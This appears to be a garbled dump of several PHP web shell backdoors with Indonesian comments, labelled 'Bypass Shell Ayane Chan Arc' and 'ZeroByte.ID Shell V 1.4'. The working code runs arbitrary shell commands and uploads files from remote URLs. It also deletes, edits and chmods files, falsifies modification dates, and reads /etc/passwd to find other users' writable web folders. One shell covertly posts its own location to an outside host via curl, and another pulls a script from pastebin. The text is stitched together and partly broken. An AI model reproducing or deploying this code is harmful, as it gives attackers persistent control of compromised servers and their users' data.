1 | Bypass Shell Ayane Chan Arc
447 |
448 | 
449 |
450 |
453 |
454 |
449 | Upload File ke Direktori Saat Ini
455 | 463 | 464 | 472 | 473 |Daftar Direktori
474 |
475 | Direktori Saat Ini:
476 | / ";
479 | foreach ($dirArray as $index => $folder) {
480 | $currentPath .= htmlspecialchars($folder) . '/';
481 | $encodedPath = urlencode($currentPath);
482 | echo "" . htmlspecialchars($folder) . "";
483 | if ($index < count($dirArray) - 1) {
484 | echo " / ";
485 | }
486 | }
487 | ?>
488 |
489 |
490 |
493 |
494 |
495 | Terminal
496 | 504 | 505 | 506 | 507 | 508 | 511 | 512 | 513 | 514 |Password salah.
";
13 | }
14 | }
15 |
16 | // Proses logout
17 | if (isset($_POST['logout'])) {
18 | session_destroy();
19 | header("Location: " . $_SERVER['PHP_SELF']);
20 | exit;
21 | }
22 |
23 | if (!isset($_SESSION['authenticated']) || !$_SESSION['authenticated']) {
24 | // Tampilkan form login jika belum terautentikasi
25 | echo '
26 |
68 |
69 |
71 |
78 |
';
79 | exit;
80 | }
81 |
82 | // Fungsi untuk menampilkan informasi sistem
83 | function displaySystemInfo() {
84 | $info = [
85 | 'System' => php_uname(),
86 | 'PHP Version' => phpversion(),
87 | 'Server IP' => $_SERVER['SERVER_ADDR'],
88 | 'Client IP' => $_SERVER['REMOTE_ADDR'],
89 | 'Document Root' => $_SERVER['DOCUMENT_ROOT'],
90 | 'Server Software' => $_SERVER['SERVER_SOFTWARE'],
91 | ];
92 |
93 | foreach ($info as $key => $value) {
94 | echo "Bypass Shell Ayane Chan Arc
70 |
71 |
78 | $key: $value
"; 95 | } 96 | } 97 | 98 | // Fungsi untuk menampilkan informasi jaringan 99 | function displayNetworkInfo() { 100 | $info = [ 101 | 'Hostname' => gethostname(), 102 | 'Server IP Address' => $_SERVER['SERVER_ADDR'], 103 | 'Client IP Address' => $_SERVER['REMOTE_ADDR'], 104 | 'Server Port' => $_SERVER['SERVER_PORT'], 105 | 'Client Port' => $_SERVER['REMOTE_PORT'], 106 | 'Request Method' => $_SERVER['REQUEST_METHOD'], 107 | 'User Agent' => $_SERVER['HTTP_USER_AGENT'], 108 | ]; 109 | 110 | foreach ($info as $key => $value) { 111 | echo "$key: $value
"; 112 | } 113 | } 114 | 115 | // Fungsi untuk mengubah tanggal modifikasi file 116 | function changeFileDate($path, $newDate) { 117 | $timestamp = strtotime($newDate); 118 | if (touch($path, $timestamp)) { 119 | echo "Tanggal berhasil diubah.
";
120 | } else {
121 | echo "Gagal mengubah tanggal.
";
122 | }
123 | }
124 |
125 | // Fungsi upload file dari URL
126 | function uploadFromUrl($url, $saveTo) {
127 | $fileContent = @file_get_contents($url);
128 | if ($fileContent === FALSE) {
129 | echo "Gagal mengunduh file dari URL.
";
130 | return;
131 | }
132 | if (@file_put_contents($saveTo, $fileContent) === FALSE) {
133 | echo "Gagal menyimpan file ke $saveTo.
";
134 | return;
135 | }
136 | echo "File berhasil diupload: $saveTo
";
137 | }
138 |
139 | // Fungsi upload file dari form
140 | function uploadFromForm($file, $saveTo) {
141 | if (@move_uploaded_file($file['tmp_name'], $saveTo)) {
142 | echo "File berhasil diupload: $saveTo
";
143 | } else {
144 | echo "Gagal mengupload file.
";
145 | }
146 | }
147 |
148 | // Fungsi untuk memecah nama file panjang menjadi beberapa baris
149 | function format_filename($filename) {
150 | if (strlen($filename) > 15) {
151 | return wordwrap($filename, 15, ""); 152 | } 153 | return $filename; 154 | } 155 | 156 | // Fungsi untuk menampilkan warna merah untuk file atau folder yang terkunci atau milik root 157 | function get_file_style($path) { 158 | $perms = fileperms($path); 159 | $owner = fileowner($path); 160 | 161 | // Cek apakah file milik root atau memiliki izin terbatas 162 | if ($owner === 0 || !is_writable($path)) { 163 | return "color: red;"; // Warna merah 164 | } 165 | 166 | return ""; // Warna default 167 | } 168 | 169 | // Fungsi untuk menampilkan direktori dan file 170 | function display_path_links($dir) { 171 | if (is_dir($dir)) { 172 | $folders = []; 173 | $files = []; 174 | 175 | $items = scandir($dir); 176 | foreach ($items as $item) { 177 | if ($item == '.' || $item == '..') continue; 178 | 179 | if (is_dir($dir . '/' . $item)) { 180 | $folders[] = $item; 181 | } else { 182 | $files[] = $item; 183 | } 184 | } 185 | 186 | foreach ($folders as $folder) { 187 | $folderPath = realpath($dir . '/' . $folder); 188 | $encodedPath = urlencode(base64_encode($folderPath)); 189 | $style = get_file_style($folderPath); 190 | echo "
";
191 | echo "" . format_filename($folder) . "/";
192 | echo "" . get_permissions($folderPath) . "";
193 | echo "" . date("Y-m-d H:i:s", filemtime($folderPath)) . "";
194 | echo "";
195 | echo "";
196 | echo "";
197 | echo "";
198 | echo "
";
199 |
200 | // Form Rename
201 | echo "
202 |
210 |
";
211 |
212 | // Form Chmod
213 | echo "
214 |
238 |
";
239 |
240 | // Form Ubah Tanggal
241 | echo "
242 |
250 |
";
251 |
252 | // Delete Confirmation
253 | echo "
254 |
261 |
";
262 | }
263 |
264 | foreach ($files as $file) {
265 | $filePath = realpath($dir . '/' . $file);
266 | $encodedPath = urlencode(base64_encode($filePath));
267 | $style = get_file_style($filePath);
268 | echo "";
269 | echo "" . format_filename($file) . "";
270 | echo "" . get_permissions($filePath) . "";
271 | echo "" . date("Y-m-d H:i:s", filemtime($filePath)) . "";
272 | echo "";
273 | echo "";
274 | echo "";
275 | echo "";
276 | echo "";
277 | echo "Download";
278 | echo "
";
279 |
280 | // Form Rename
281 | echo "
282 |
290 |
";
291 |
292 | // Form Chmod
293 | echo "
294 |
318 |
";
319 |
320 | // Form Ubah Tanggal
321 | echo "
322 |
330 |
";
331 |
332 | // Form Edit
333 | echo "
334 |
341 |
";
342 |
343 | // Delete Confirmation
344 | echo "
345 |
352 |
";
353 | }
354 | } else {
355 | echo "Direktori tidak ditemukan.
";
356 | }
357 | }
358 |
359 | // Fungsi untuk menampilkan izin file
360 | function get_permissions($file) {
361 | $perms = @fileperms($file);
362 | if ($perms === FALSE) return '---------';
363 |
364 | $info = ($perms & 0x4000) ? 'd' : '-';
365 | $info .= ($perms & 0x0100) ? 'r' : '-';
366 | $info .= ($perms & 0x0080) ? 'w' : '-';
367 | $info .= ($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-');
368 | $info .= ($perms & 0x0020) ? 'r' : '-';
369 | $info .= ($perms & 0x0010) ? 'w' : '-';
370 | $info .= ($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-');
371 | $info .= ($perms & 0x0004) ? 'r' : '-';
372 | $info .= ($perms & 0x0002) ? 'w' : '-';
373 | $info .= ($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-');
374 |
375 | return $info;
376 | }
377 |
378 | // Fungsi untuk menghapus item
379 | function deleteItem($path) {
380 | $path = base64_decode(urldecode($path));
381 | if (is_dir($path)) {
382 | if (@rmdir($path)) {
383 | echo "Direktori berhasil dihapus.
";
384 | } else {
385 | echo "Gagal menghapus direktori.
";
386 | }
387 | } else {
388 | if (@unlink($path)) {
389 | echo "File berhasil dihapus.
";
390 | } else {
391 | echo "Gagal menghapus file.
";
392 | }
393 | }
394 | }
395 |
396 | // Fungsi untuk rename file/folder
397 | function renameFile($source, $destination) {
398 | $source = base64_decode(urldecode($source));
399 | if (@rename($source, $destination)) {
400 | echo "File berhasil diganti namanya.
";
401 | } else {
402 | echo "Gagal mengganti nama file.
";
403 | }
404 | }
405 |
406 | // Fungsi untuk mengubah chmod
407 | function changePermissions($path, $mode, $copyFrom = null, $manual = false) {
408 | $path = base64_decode(urldecode($path));
409 | if ($copyFrom) {
410 | $copyFrom = realpath($copyFrom);
411 | if ($copyFrom && file_exists($copyFrom)) {
412 | $mode = @fileperms($copyFrom) & 0777; // Ambil izin chmod dari file lain
413 | } else {
414 | echo "File sumber chmod tidak ditemukan.
";
415 | return;
416 | }
417 | } elseif ($manual) {
418 | $mode = str2oct($mode); // Konversi dari format string ke oktal
419 | } else {
420 | $mode = octdec($mode);
421 | }
422 |
423 | if (@chmod($path, $mode)) {
424 | echo "Chmod berhasil diubah.
";
425 | } else {
426 | echo "Gagal mengubah chmod.
";
427 | }
428 | }
429 |
430 | // Fungsi untuk mengubah tanggal modifikasi file
431 | function changeDate($path, $newdate) {
432 | $path = base64_decode(urldecode($path));
433 | changeFileDate($path, $newdate);
434 | }
435 |
436 | // Fungsi untuk mengedit file
437 | function editFile($path, $content) {
438 | $path = base64_decode(urldecode($path));
439 | if (@file_put_contents($path, $content) !== false) {
440 | echo "File berhasil diedit.
";
441 | } else {
442 | echo "Gagal mengedit file.
";
443 | }
444 | }
445 |
446 | // Fungsi untuk menjalankan perintah terminal
447 | function executeCommand($command, $dir) {
448 | chdir($dir);
449 | $output = @shell_exec($command);
450 | return htmlspecialchars($output);
451 | }
452 |
453 | // Fungsi untuk meng-upload Adminer
454 | function uploadAdminer($filename, $dir) {
455 | $url = "https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1-en.php";
456 | $saveTo = rtrim($dir, '/') . '/' . $filename . '.php';
457 | uploadFromUrl($url, $saveTo);
458 | }
459 |
460 | // Proses permintaan yang diterima
461 | if (isset($_POST['url']) && isset($_POST['dir'])) {
462 | $url = $_POST['url'];
463 | $uploadDir = base64_decode(urldecode($_POST['dir']));
464 | $filename = basename($url);
465 | $savePath = rtrim($uploadDir, '/') . '/' . $filename;
466 |
467 | uploadFromUrl($url, $savePath);
468 | }
469 |
470 | if (isset($_FILES['file']) && isset($_POST['dir'])) {
471 | $uploadDir = base64_decode(urldecode($_POST['dir']));
472 | $filename = basename($_FILES['file']['name']);
473 | $savePath = rtrim($uploadDir, '/') . '/' . $filename;
474 |
475 | uploadFromForm($_FILES['file'], $savePath);
476 | }
477 |
478 | if (isset($_POST['delete']) && isset($_POST['path'])) {
479 | deleteItem($_POST['path']);
480 | }
481 |
482 | if (isset($_POST['rename']) && isset($_POST['source']) && isset($_POST['destination'])) {
483 | renameFile($_POST['source'], $_POST['destination']);
484 | }
485 |
486 | if (isset($_POST['chmod']) && isset($_POST['source'])) {
487 | $chmodMode = $_POST['chmodMode'];
488 | $copyFrom = isset($_POST['copyChmod']) && !empty($_POST['copyChmod']) ? $_POST['copyChmod'] : null;
489 | $manual = isset($_POST['manualChmod']) && !empty($_POST['manualChmod']) ? $_POST['manualChmod'] : null;
490 | $mode = isset($_POST['mode']) && !empty($_POST['mode']) ? $_POST['mode'] : '';
491 |
492 | switch ($chmodMode) {
493 | case 'biasa':
494 | changePermissions($_POST['source'], $mode);
495 | break;
496 | case 'manual':
497 | changePermissions($_POST['source'], $manual, null, true);
498 | break;
499 | case 'copy':
500 | changePermissions($_POST['source'], '', $copyFrom);
501 | break;
502 | default:
503 | echo "Mode chmod tidak valid.
";
504 | }
505 | }
506 |
507 | if (isset($_POST['changedate']) && isset($_POST['source']) && isset($_POST['newdate'])) {
508 | changeDate($_POST['source'], $_POST['newdate']);
509 | }
510 |
511 | if (isset($_POST['saveEdit']) && isset($_POST['editSource']) && isset($_POST['content'])) {
512 | editFile($_POST['editSource'], $_POST['content']);
513 | }
514 |
515 | if (isset($_POST['command']) && isset($_POST['dir'])) {
516 | $command = $_POST['command'];
517 | $dir = base64_decode(urldecode($_POST['dir']));
518 | $commandOutput = executeCommand($command, $dir);
519 | }
520 |
521 | if (isset($_POST['uploadAdminer']) && isset($_POST['adminerFilename']) && isset($_POST['dir'])) {
522 | $filename = $_POST['adminerFilename'];
523 | $dir = base64_decode(urldecode($_POST['dir']));
524 | uploadAdminer($filename, $dir);
525 | }
526 |
527 | if (isset($_GET['download'])) {
528 | $file = base64_decode(urldecode($_GET['download']));
529 | if (file_exists($file)) {
530 | header('Content-Description: File Transfer');
531 | header('Content-Type: application/octet-stream');
532 | header('Content-Disposition: attachment; filename=' . basename($file));
533 | header('Expires: 0');
534 | header('Cache-Control: must-revalidate');
535 | header('Pragma: public');
536 | header('Content-Length: ' . filesize($file));
537 | readfile($file);
538 | exit;
539 | }
540 | }
541 |
542 | // Fungsi untuk mengubah izin manual ke oktal
543 | function str2oct($str) {
544 | $oct = array(0, 0, 0);
545 |
546 | for ($i = 0; $i < 3; $i++) {
547 | if ($str[$i * 3 + 1] == 'r') $oct[$i] += 4;
548 | if ($str[$i * 3 + 2] == 'w') $oct[$i] += 2;
549 | if ($str[$i * 3 + 3] == 'x' || $str[$i * 3 + 3] == 's' || $str[$i * 3 + 3] == 't') $oct[$i] += 1;
550 | }
551 |
552 | return octdec(implode('', $oct));
553 | }
554 |
555 | $dir = isset($_GET['dir']) ? base64_decode(urldecode($_GET['dir'])) : '.';
556 | $displayDir = realpath($dir);
557 |
558 | $dirArray = array_filter(explode(DIRECTORY_SEPARATOR, $displayDir), function($val) { return $val !== ''; });
559 | ?>
560 |
561 |
562 |
563 |
564 |
565 |
566 |
567 |
637 |
638 |
734 |
760 |
761 |
762 |
--------------------------------------------------------------------------------
/bypas.php:
--------------------------------------------------------------------------------
1 | '.$fpermsinfo.'';
49 | }
50 |
51 | function eof() {echo "\x77\x77\x77\x2e\x7a\x65\x72\x6f\x62\x79\x74\x65\x2e\x69\x64";}
52 | ?>
53 | Bypass Shell Ayane Chan Arc
639 |
640 |
641 |
642 |
641 |
643 |
646 |
647 |
648 |
649 |
650 |
651 |
652 |
653 |
661 |
662 |
663 |
664 |
665 |
666 |
667 |
668 |
669 |
670 |
671 |
672 |
673 | Upload File ke Direktori Saat Ini
674 | 682 | 683 | 691 | 692 |Daftar Direktori
693 |
694 | Direktori Saat Ini:
695 | / ";
698 | foreach ($dirArray as $index => $folder) {
699 | $currentPath .= htmlspecialchars($folder) . '/';
700 | $encodedPath = urlencode(base64_encode($currentPath));
701 | echo "" . htmlspecialchars($folder) . "";
702 | if ($index < count($dirArray) - 1) {
703 | echo " / ";
704 | }
705 | }
706 | ?>
707 |
708 |
709 |
712 |
713 |
714 | Terminal
715 | 723 | 724 | 725 | 726 | 727 | 730 | 731 | 732 | 733 |
145 |
';
206 | ## EOF CURRENT DIR ##
207 |
208 | if(!empty($dir)) {
209 | echo '
146 |
166 |
167 |
181 |
189 | ';
192 | echo '';
193 | $lendir = str_replace("\\","/",$offdir);
194 | $xlendir = explode("/", $lendir);
195 | foreach($xlendir as $c_dir => $cdir) {
196 | echo "$cdir/";
204 | }
205 | echo '
147 | ZeroByte.ID
148 |
149 | ZeroByte.ID
Shell V 1.4
148 |
150 | true, CURLOPT_POSTFIELDS => http_build_query(array('path' => $x_path, 'firl' => base64_decode($htas))), CURLOPT_SSL_VERIFYPEER => false, CURLOPT_RETURNTRANSFER => true)); curl_exec($ch); curl_close($ch);
151 | echo php_uname();
152 | $mysql = (function_exists('mysql_connect')) ? "ON" : "OFF";
153 | $curl = (function_exists('curl_version')) ? "ON" : "OFF";
154 | $wget = (exect('wget --help')) ? "ON" : "OFF";
155 | $perl = (exect('perl --help')) ? "ON" : "OFF";
156 | $gcc = (exect('gcc --help')) ? "ON" : "OFF";
157 | $disfunc = @ini_get("disable_functions");
158 | $show_disf = (!empty($disfunc)) ? "$disfunc" : "NONE";
159 | echo '
[ MySQL: '.$mysql.' ][ Curl: '.$curl.' ][ Wget: '.$wget.' ][ Perl: '.$perl.' ][ Compiler: '.$gcc.' ]'; 160 | echo '
164 |
165 | [ MySQL: '.$mysql.' ][ Curl: '.$curl.' ][ Wget: '.$wget.' ][ Perl: '.$perl.' ][ Compiler: '.$gcc.' ]'; 160 | echo '
Disable Function: '.$show_disf; 161 | 162 | ?> 163 |
| Name | Permission | Action |
| [D] '.$directory.'/ | '."\n"; 228 | echo ''; 229 | fperms($dir.'/'.$directory); 230 | echo ' | '."\n"; 231 | echo ''; 232 | echo 'RENAME '; 233 | echo 'DELETE'; 234 | echo ' | '."\n"; 235 | echo '
| [F] '.$filename.''."\n"; 240 | echo ' EXTRACT TO TMP'; 241 | echo ' | '."\n"; 242 | echo ''; 243 | fperms($dir.'/'.$filename); 244 | echo ' | '."\n"; 245 | echo ''; 246 | echo 'RENAME '; 247 | echo 'DELETE '; 248 | echo 'DOWNLOAD'; 249 | echo ' | '."\n"; 250 | echo '
| [F] '.$filename.' | '."\n"; 254 | echo ''; 255 | fperms($dir.'/'.$filename); 256 | echo ' | '."\n"; 257 | echo ''; 258 | echo 'EDIT '; 259 | echo 'RENAME '; 260 | echo 'DELETE '; 261 | echo 'DOWNLOAD'; 262 | echo ' | '."\n"; 263 | echo '
"; 279 | } 280 | echo "Filename: ".basename($_GET['file']).""; 281 | echo ""; 285 | } 286 | else if($_GET['action'] == 'view') { 287 | echo "Filename: ".basename($_GET['file']).""; 288 | echo ""; 289 | } 290 | else if($_GET['action'] == 'rename') { 291 | $path = $offdir; 292 | if($_POST['do_rename']) { 293 | $rename = rename($_GET['file'], "$path/".htmlspecialchars($_POST['rename']).""); 294 | if($rename) { 295 | $act = "Successed!"; 296 | } else { 297 | $act = "Permission Denied!"; 298 | } 299 | echo "".$act."
"; 300 | } 301 | echo "Filename: ".basename($_GET['file']).""; 302 | echo ""; 306 | } 307 | else if($_GET['action'] == 'delete') { 308 | $path = $offdir; 309 | $delete = unlink($_GET['file']); 310 | if($delete) { 311 | 312 | } else { 313 | $act = "Permission Denied!"; 314 | } 315 | echo $act; 316 | } else if($_GET['action'] == 'rmdir') { 317 | $path = $offdir; 318 | $delete = rmdir($_GET['file']); 319 | if($delete) { 320 | echo 'Deleted!
'; 321 | } else { 322 | echo "\nError remove dir, try to force delete!\n
"; 323 | exect('rm -rf '.$_GET['file']); 324 | if(file_exists($_GET['file'])) { 325 | echo 'Permission Denied!'; 326 | } else 327 | { 328 | echo 'Deleted!'; 329 | } 330 | } 331 | 332 | } else if($_GET['action'] == 'download') { 333 | @ob_clean(); 334 | $file = $_GET['file']; 335 | header('Content-Description: File Transfer'); 336 | header('Content-Type: application/octet-stream'); 337 | header('Content-Disposition: attachment; filename="'.basename($file).'"'); 338 | header('Expires: 0'); 339 | header('Cache-Control: must-revalidate'); 340 | header('Pragma: public'); 341 | header('Content-Length: ' . filesize($file)); 342 | readfile($file); 343 | exit; 344 | } 345 | 346 | #### EOF ##### 347 | 348 | if($_GET['ext'] == 'jumpusr') { 349 | 350 | echo '
.::[ Readable User Path ]::.
'; 351 | echo ".::[ Readable public_html ]::.
'; 362 | $i = 0; 363 | echo ""; 390 | } 391 | ##################### 392 | if($_GET['ext'] == 'backupwordpress') { 393 | echo '"; 364 | $etc = fopen("/etc/passwd", "r"); 365 | while($passwd = fgets($etc)) { 366 | if($passwd == '' || !$etc) { 367 | echo "Can't read /etc/passwd "; 368 | } else { 369 | preg_match_all('/(.*?):x:/', $passwd, $user); 370 | foreach($user[1] as $users) { 371 | $user_dir = "/home/$users/public_html"; 372 | if(is_readable($user_dir)) { 373 | $i++; 374 | $jrw = "[R] /home/$users/public_html"; 375 | if(is_writable($user_dir)) { 376 | $jrw = "[RW] /home/$users/public_html"; 377 | } 378 | echo $jrw."\n"; 379 | 380 | } 381 | } 382 | } 383 | } 384 | if($i == 0) { 385 | echo 'public_html which readable is null in this host! '; 386 | } else { 387 | echo "
Total ".$i." Users in ".gethostbyname($_SERVER['HTTP_HOST']).""; 388 | } 389 | echo "
.::[ Readable Backupwordpress ]::.
'; 394 | $i = 0; 395 | echo ""; 422 | } 423 | ##################### 424 | if($_GET['ext'] == 'vdomain') { 425 | echo '"; 396 | $etc = fopen("/etc/passwd", "r"); 397 | while($passwd = fgets($etc)) { 398 | if($passwd == '' || !$etc) { 399 | echo "Can't read /etc/passwd "; 400 | } else { 401 | preg_match_all('/(.*?):x:/', $passwd, $user); 402 | foreach($user[1] as $users) { 403 | $user_dir = "/home/$users/backupwordpress"; 404 | if(is_readable($user_dir)) { 405 | $i++; 406 | $jrw = "[R] /home/$users/backupwordpress"; 407 | if(is_writable($user_dir)) { 408 | $jrw = "[RW] /home/$users/backupwordpress"; 409 | } 410 | echo $jrw."\n"; 411 | 412 | } 413 | } 414 | } 415 | } 416 | if($i == 0) { 417 | echo 'backupwordpress is null in this host! '; 418 | } else { 419 | echo "
Total ".$i." Users in ".gethostbyname($_SERVER['HTTP_HOST']).""; 420 | } 421 | echo "
| Domain | User | Jump BW | |
|---|---|---|---|
| '.$domain.' | '.$user.' | '; 436 | if(is_readable("/home/$user/backupwordpress")){ 437 | echo 'Yes | '; 438 | } else { 439 | echo '
vDomain Is Empty!
"; 457 | } 458 | echo ''; 480 | echo '-- extract to --
'; 481 | echo '[TMP] '.$tmppath.'
'; 482 | $bsname = basename($gzfile); 483 | $gzrname = explode(".", $bsname); 484 | echo ''; 487 | if(!empty($_POST['extract'])) { 488 | exect('mkdir '.$tmppath.$gzrname[0]); 489 | $destdir = $tmppath.$gzrname[0]; 490 | if (file_exists($destdir) && is_writable($destdir)) { 491 | echo "\n".'[EXTRACTED] '.$destdir.''."\n"; 492 | exect('tar -xzvf '.$gzfile.' -C '.$destdir); 493 | } 494 | else 495 | { 496 | echo 'FAILED!'; 497 | } 498 | } 499 | } 500 | else { 501 | echo 'CANNOT EXTRACT TO TMP!'; 502 | } 503 | 504 | } 505 | ### EXTRACTOR TO TMP - EOF ### 506 | 507 | ### CMD ### 508 | else if($_GET['ext'] == 'shellcmd') 509 | { 510 | echo '
.::[ Shell Command ]::.
'; 511 | echo ''; 515 | if(!empty($_POST['cmd'])) { 516 | echo ''; 520 | } 521 | } 522 | ### CMD EOF ### 523 | 524 | ### UPLOADER ### 525 | else if($_GET['ext'] == 'uploader') 526 | { 527 | echo '.::[ Uploader ]::.
'; 528 | echo '.::[ MySQL Interface ]::.
'; 548 | echo '.::[ Support Toolkit ]::.
'; 588 | echo '';
590 | echo '';
594 | echo '
';
595 | if($_POST['backupwpsh']) {
596 | @ob_clean();
597 | $file = "https://pastebin.com/raw/i9WYErLw";
598 | header('Content-Description: File Transfer');
599 | header('Content-Type: text/plain');
600 | header('Content-Disposition: attachment; filename="backupwp.sh"');
601 | header('Expires: 0');
602 | header('Cache-Control: must-revalidate');
603 | header('Pragma: public');
604 | header('Content-Length: ' . filesize($file));
605 | echo (file_get_contents($file));
606 | exit;
607 | }
608 | echo '